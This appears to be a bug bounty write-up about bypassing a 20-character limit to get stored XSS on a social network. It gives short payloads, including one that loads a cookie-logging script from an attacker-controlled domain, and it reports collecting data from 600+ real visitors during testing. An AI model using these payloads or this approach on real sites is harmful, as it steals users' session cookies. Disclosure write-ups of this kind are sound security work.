How I paid 2$ for a 1054$ XSS bug + 20 chars blind XSS payloads

Hey there :)

This is my first write up, I decided to share this story because I spent nights on it and I finally found a solution to my problem.

The story :

I was invited some months ago to a private bugcrowd program that was going to start some days later.

I found some bugs and took a break.

During the last 5 days of the program I told myself I have to find some bugs before this program ends ( I want $$ boiiii) so I took another view of the program.

Checked the scope again etc…

This private program was a big social network (can’t tell the name it’s private bruh) but the point is I went to create a new account.

Username : I enter an XSS payload but no special character allowed : <:’();?> and the field was limited to 20 characters :

Image for post
Image for post

So I forgot about XSS and looked for another bugs.

Later I visited the 2nd in scope domain that was another social media, tried to create a new account using my email but I got an error : User already registered, please login. What happens ? Seems like the 2 sites use the same database so you could use the same account for the 2 sites.

So I logged in and moved to my profile and though I will try and edit my username here, I was surprised that there was not characters restricted :D

I was like :

But this field is limited to 20 chars too :(

I first entered a simple payload to confirm the XSS : <svg/onload=alert()> = 20 chars

I saved and visited my profile on the main site (I want it to work on the main site because the bounties here were higher). And boom alert box appear :D

Now that XSS is valid, time to work on a XSS payload to log cookies of who ever visits my profile, because remember : the higher the security impact is, the higher the bounty will be, thanks master yoda.

But the problem is, how to enter a valid 20 chars XSS payload to log cookies? the xsshunter tool is useful but way too long, so I started digging every night and after 48 hours I found this tweet with this short payload from @0x6D6172696F :

Image for post
Image for post

<script/src=//⑭.₨> = 18 chars (₨ here is Indian Rupee and is considered as 1 char instead of 2, same for the ⑭)

But it says only in MS Edge so I told myself I have nothing to lose so I entered this payload in Chrome and Firefox and boom. XSS triggers.

Now, I had to rent a (2 numbers).rs domain for the PoC, but the prices are quite high for me (90 usd approx), so I asked myself how can I reach the highest impact without spending 90 usd ?

After some days I had an idea, I directly went to namecheap.com (thanks to @brutelogic) to check the cheaper .2chars domain and found .pw, so I checked for RsRs.pw : It was 90 cents/year :D So the domain + dns = approx. 2.10$

I directly went to the panel and redirected rsrs.pw to my xsshunter link (name).xsshunter.com where my blind XSS payload is hosted, returned to the site and created this payload : <script src=//₨₨.pw> = 20 chars. Saved it and visited my profile, and boom :

Image for post
Image for post

Me, talking to myself :

After 1 month (till they fixed this) I got +600 victims without doing anything (kept receiving emails from xsshunter) and +1000$ bounty :)

I know this is long but I can’t resume 5 nights of work in 10 lines ^^

Take-away:

  • When you see characters limitation or when a character is restricted somewhere, try to embed 2 chars into 1 or use the Greek dictionary to find a similar character.
  • Sometimes you can go to an out of scope domain or lowest bounty domain to get a valid bug/high bounty bug

Thank you for reading,

Daher Mohamed aka m0m0x01d :)

Written by

Hey

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store